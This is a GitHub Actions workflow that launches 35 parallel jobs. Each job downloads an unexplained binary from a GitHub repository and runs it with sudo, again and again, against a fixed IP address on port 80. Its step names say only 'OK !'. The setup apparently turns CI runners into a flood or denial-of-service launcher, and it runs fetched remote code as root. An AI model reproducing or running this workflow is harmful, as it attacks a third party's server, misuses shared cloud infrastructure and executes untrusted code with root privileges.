name: Ubuntu VDS 20 saniye

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]

    steps:
      - name: OK !
        run: |
          wget https://github.com/Paraloxd/tekpoyraz/raw/refs/heads/main/tekpoyraz -O tekpoyraz
          chmod +x tekpoyraz
          for i in {1..16}; do
            timeout 30 sudo ./tekpoyraz 159.146.71.6 80
          done

      - name: OK !
        run: sleep 30
        
      - name: OK !
        run: sudo shutdown now
